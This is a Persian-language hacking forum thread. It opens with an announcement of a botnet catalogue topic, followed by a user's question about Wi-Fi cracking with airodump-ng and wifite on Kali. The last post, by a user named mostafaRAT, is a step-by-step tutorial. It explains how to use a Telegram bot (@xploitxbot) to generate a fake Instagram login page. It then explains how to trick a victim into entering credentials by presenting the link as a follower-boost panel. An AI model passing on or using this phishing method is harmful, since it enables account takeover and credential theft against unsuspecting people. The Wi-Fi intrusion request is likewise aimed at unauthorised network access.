    به نام برنامه نویس هستی ♥! سلام دوستان با تاپیک جامع بات نت ها در خدمتتون هستم ../ در این تاپیک قرار هست انواع بات نت هارو با مشخصات براتون قرار بدم ../ برای دریافت اطلاعات درباره بات نت ها میتونید از این لینک استفاده کنید ../ لطفا به هیچ وجه اسپم ندید ../ ! در صورتی که براتون سوالی پیپش بیاد یا به بنده و یا به کاربران @R3dC0d3r @REX پیام خصوصی ارسال کنید../ با سپاس فراوان یا حـ ـق../ 2018/11/13
  24. moana
    سلام و خسته نباشید لطفا اساتید راهنمایی کنید درمورد هک وای فای با کالی من موقع انجام دستورات در کد airodump-ng wlan0mon وقتی میزنم همینطور میگرده چیزی هم پیدا نمیکنه و وای فای ستینگم خراب میشه هیچ وای فای رو پیدا نمیکنه باید ریستارت کنم من کالی رو بعنوان ویندوز دوم نصب کردم و با لب تاب هم هستم فک کنم wlan مال یو اس بی وایرلس هست لطفا راهنمایی کنید😢 حتی با دستور wifite هم امتحان کردم اونم چیزی پیدا نمیکنه کلی هم وای فای این اطراف هست
  25. mostafaRAT
    با سلام امروز میخوام یک اموزش دیگر مربوط به نفوذ به اینستاگرام رو بهتون یاد بدم. ابتدا سایت زیر رو در مرورگر خود باز کنید. [Hidden Content] 🙌داخلش ثبت نام کنید🙌 چیزی که مهمه تو ذهنتون بسپارید [یوزر ] [پسورد] که توی سایت وارد کردین هنگام ثبت باید یادتون باشه⚠️ الان باید برید ربات زیر👇 @xploitxbot دکمه Start/ رو بزنید. سپس login/ ارسال کنید. بعد از ارسال این کلید username که توی سایت ثبت نام کردید رو ارسال کنید. سپس از شما رمز اکانتی که ساختید رو میخواد. بعد اگه با موفقیت اطلاعات ثبت بشه باید گزینه اول یعنی generator/ رو ارسال کنید. گزینه instagram/ رو ارسال کنید. چون.میخوایم فیک پیج اینستا بسازیم. بعد از آن از شما یک لینک میخواد که با http شروع بشه. برای مثال میتونید ادرس ایدی اکانت خودتون یا کانال رو وارد کنید. [Hidden Content]*** بجای علامت *** نام کاربری خودتون رو بدون @ بزارید. مثلا اگه من بخوام ایدی خودم رو به اون صورت بزارم به این شکل میشه👇 [Hidden Content]ctrl123 خب پس از اون یک لینکی بهتون میده که باید بدید به قربانی و بهش بگید که سایت دریافت افزایش فالور هست یا بهش بگید پنل فالور هست و اگه قربانی اطلاعات اکانتشو وارد کنه میتونید نفوذ کنید به اکانتش.
×
×
  • ایجاد مورد جدید...